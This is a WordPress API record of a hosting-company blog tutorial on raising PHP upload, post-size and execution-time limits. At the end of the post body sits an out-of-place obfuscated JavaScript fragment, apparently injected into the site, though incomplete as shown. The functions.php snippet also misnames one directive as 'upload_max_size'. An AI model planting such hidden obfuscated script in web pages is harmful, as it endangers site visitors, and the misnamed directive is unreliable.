{"id":456,"date":"2021-07-17T22:05:23","date_gmt":"2021-07-17T22:05:23","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=456"},"modified":"2024-08-12T13:34:44","modified_gmt":"2024-08-12T12:34:44","slug":"how-to-increase-the-maximum-file-upload-size-in-wordpress","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/","title":{"rendered":"How to Increase the Maximum File Upload Size in WordPress"},"content":{"rendered":"<p>Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files via media uploader, or install plugins and themes. In this article, we will show you how to easily increase the maximum file upload size in WordPress to fix those issues.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"wp-image-457 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-7-300x177.png\" alt=\"\" width=\"395\" height=\"233\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-7-300x177.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-7.png 559w\" sizes=\"(max-width: 395px) 100vw, 395px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h4>How to Check Your Maximum File Upload Size Limit in WordPress?<\/h4>\n<p>WordPress will automatically show the maximum file upload size limit when you are uploading images or media. To check it you can simply go to\u00a0<strong>Media \u00bb Add New<\/strong>\u00a0page and you will see the maximum file uplaod size limit for your WordPress site.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-458 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8-300x160.png\" alt=\"\" width=\"407\" height=\"217\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8-300x160.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png 545w\" sizes=\"(max-width: 407px) 100vw, 407px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h4>1: Theme Functions File<\/h4>\n<p>There are cases where we have seen that just by adding the following code in theme\u2019s\u00a0functions.php\u00a0file, you can increase the upload size:<\/p>\n<div>\n<div id=\"highlighter_554285\" class=\"syntaxhighlighter  php\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"gutter\">\n<div class=\"line number1 index0 alt2\">1<\/div>\n<div class=\"line number2 index1 alt1\">2<\/div>\n<div class=\"line number3 index2 alt2\">3<\/div>\n<\/td>\n<td class=\"code\">\n<div class=\"container\">\n<div class=\"line number1 index0 alt2\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">( <\/code><code class=\"php string\">'upload_max_size'<\/code> <code class=\"php plain\">, <\/code><code class=\"php string\">'64M'<\/code> <code class=\"php plain\">);<\/code><\/div>\n<div class=\"line number2 index1 alt1\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">( <\/code><code class=\"php string\">'post_max_size'<\/code><code class=\"php plain\">, <\/code><code class=\"php string\">'64M'<\/code><code class=\"php plain\">);<\/code><\/div>\n<div class=\"line number3 index2 alt2\"><code class=\"php plain\">@<\/code><code class=\"php functions\">ini_set<\/code><code class=\"php plain\">( <\/code><code class=\"php string\">'max_execution_time'<\/code><code class=\"php plain\">, <\/code><code class=\"php string\">'300'<\/code> <code class=\"php plain\">);<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h4>2. Create or Edit an existing PHP.INI file<\/h4>\n<p>For this method you will need to access your WordPress site\u2019s root folder by\u00a0using FTP\u00a0or File Manager app in your hosting account\u2019s cPanel dashboard.<\/p>\n<p>In most cases if you are on a shared host, then you will not see a php.ini file in your directory. If you do not see one, then create a file called php.ini and upload it in the root folder. In that file add the following code:<\/p>\n<div>\n<div id=\"highlighter_487441\" class=\"syntaxhighlighter  php\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"gutter\">\n<div class=\"line number1 index0 alt2\">1<\/div>\n<div class=\"line number2 index1 alt1\">2<\/div>\n<div class=\"line number3 index2 alt2\">3<\/div>\n<\/td>\n<td class=\"code\">\n<div class=\"container\">\n<div class=\"line number1 index0 alt2\"><code class=\"php plain\">upload_max_filesize = 64M<\/code><\/div>\n<div class=\"line number2 index1 alt1\"><code class=\"php plain\">post_max_size = 64M<\/code><\/div>\n<div class=\"line number3 index2 alt2\"><code class=\"php plain\">max_execution_time = 300<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>This method is reported to work for many users. Remember if 64 doesn\u2019t work, then try 10MB (sometimes that work).<\/p>\n<h4>3. htaccess Method<\/h4>\n<p>Some people have tried using the\u00a0.htaccess\u00a0method where by modifying the .htaccess file in the root directory, you can increase the maximum upload size in WordPress. Edit the .htaccess file in your WordPress site\u2019s root folder and add the following code:<\/p>\n<div>\n<div id=\"highlighter_888199\" class=\"syntaxhighlighter  php\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"gutter\">\n<div class=\"line number1 index0 alt2\">1<\/div>\n<div class=\"line number2 index1 alt1\">2<\/div>\n<div class=\"line number3 index2 alt2\">3<\/div>\n<div class=\"line number4 index3 alt1\">4<\/div>\n<\/td>\n<td class=\"code\">\n<div class=\"container\">\n<div class=\"line number1 index0 alt2\"><code class=\"php plain\">php_value upload_max_filesize 64M<\/code><\/div>\n<div class=\"line number2 index1 alt1\"><code class=\"php plain\">php_value post_max_size 64M<\/code><\/div>\n<div class=\"line number3 index2 alt2\"><code class=\"php plain\">php_value max_execution_time 300<\/code><\/div>\n<div class=\"line number4 index3 alt1\"><code class=\"php plain\">php_value max_input_time 300<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"increase-the-max-upload-file-size-in-wordpress-multisite\" class=\"has-anchor-hash\">Increase the Max Upload File Size in WordPress Multisite<\/h2>\n<p>If you\u2019re running a\u00a0WordPress Multisite network, then you can modify the max upload file size for your network.<\/p>\n<p>First, head to your\u00a0<strong>Network Admin<\/strong>\u00a0dashboard, and then go to\u00a0<strong>Settings &gt; Network Settings<\/strong>\u00a0screen. Here, scroll down till you find the\u00a0<strong>Upload Settings<\/strong>\u00a0section. You\u2019ll find the\u00a0<code><strong>Max upload file size<\/strong><\/code>\u00a0field in this area.<\/p>\n<\/div>\n<\/div>\n<p>We hope this article helped you increase the maximum file upload size in WordPress.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-459 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-300x136.png\" alt=\"\" width=\"386\" height=\"175\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-300x136.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-1024x465.png 1024w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-768x349.png 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size.png 1100w\" sizes=\"(max-width: 386px) 100vw, 386px\" \/><\/p>\n<p>The default value of\u00a0<strong>Max upload file size<\/strong>\u00a0in a WordPress Multisite is\u00a0<strong>1500 KB<\/strong>\u00a0(~<strong>1.5 MB<\/strong>). You can change this to a higher value and click the\u00a0<strong>Save Changes<\/strong>\u00a0button.<\/p>\n<p><strong>Note:<\/strong>\u00a0You cannot circumvent the server-level max upload size limit from here. If the limit you set here is higher than the server\u2019s max upload size limit, the server will ignore it. You can use the methods described above to find your webserver\u2019s configuration.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-460 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-New-300x136.png\" alt=\"\" width=\"408\" height=\"185\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-New-300x136.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-New-1024x465.png 1024w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-New-768x349.png 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Network-Admin-Settings-Max-Upload-Size-New.png 1100w\" sizes=\"(max-width: 408px) 100vw, 408px\" \/><\/p>\n<p>Here, we\u2019ve set the new max upload file size to\u00a0<strong>131072 KB<\/strong>\u00a0(~<strong>128 MB<\/strong>).<\/p>\n<p>You can also limit the total size of files uploaded to an individual site in the Multisite network. However, it\u2019s disabled by default.<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":458,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[9],"tags":[],"class_list":["post-456","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to Increase the Maximum File Upload Size in WordPress<\/title>\n<meta name=\"description\" content=\"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to Increase the Maximum File Upload Size in WordPress\" \/>\n<meta property=\"og:description\" content=\"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-17T22:05:23+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png\" \/>\n\t<meta property=\"og:image:width\" content=\"545\" \/>\n\t<meta property=\"og:image:height\" content=\"290\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to Increase the Maximum File Upload Size in WordPress\",\"datePublished\":\"2021-07-17T22:05:23+00:00\",\"dateModified\":\"2024-08-12T12:34:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\"},\"wordCount\":490,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png\",\"articleSection\":[\"wordpress\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\",\"name\":\"How to Increase the Maximum File Upload Size in WordPress\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png\",\"datePublished\":\"2021-07-17T22:05:23+00:00\",\"dateModified\":\"2024-08-12T12:34:44+00:00\",\"description\":\"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png\",\"width\":545,\"height\":290},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to Increase the Maximum File Upload Size in WordPress\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to Increase the Maximum File Upload Size in WordPress","description":"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/","og_locale":"en_US","og_type":"article","og_title":"How to Increase the Maximum File Upload Size in WordPress","og_description":"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files","og_url":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-07-17T22:05:23+00:00","article_modified_time":"2024-08-12T12:34:44+00:00","og_image":[{"width":545,"height":290,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png","type":"image\/png"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to Increase the Maximum File Upload Size in WordPress","datePublished":"2021-07-17T22:05:23+00:00","dateModified":"2024-08-12T12:34:44+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/"},"wordCount":490,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png","articleSection":["wordpress"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/","url":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/","name":"How to Increase the Maximum File Upload Size in WordPress","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png","datePublished":"2021-07-17T22:05:23+00:00","dateModified":"2024-08-12T12:34:44+00:00","description":"Do you want to increase the maximum file upload size in WordPress. Some times low file upload size limit can stop you from uploading files","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/07\/Screenshot-8.png","width":545,"height":290},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-increase-the-maximum-file-upload-size-in-wordpress\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to Increase the Maximum File Upload Size in WordPress"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=456"}],"version-history":[{"count":1,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/456\/revisions"}],"predecessor-version":[{"id":461,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/456\/revisions\/461"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/458"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}